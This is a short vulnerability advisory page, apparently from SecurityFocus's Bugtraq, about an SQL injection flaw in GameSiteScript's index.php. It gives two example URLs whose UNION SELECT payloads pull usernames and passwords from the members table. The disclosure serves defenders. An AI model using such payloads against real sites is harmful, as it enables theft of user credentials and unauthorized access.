Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

GameSiteScript Index.PHP SQL Injection Vulnerability

No exploit is required.

An example URIs has been provided:


http://www.example.com/iindex.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1

http://www.example.com/index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1







 

Privacy Statement
Copyright 2009, SecurityFocus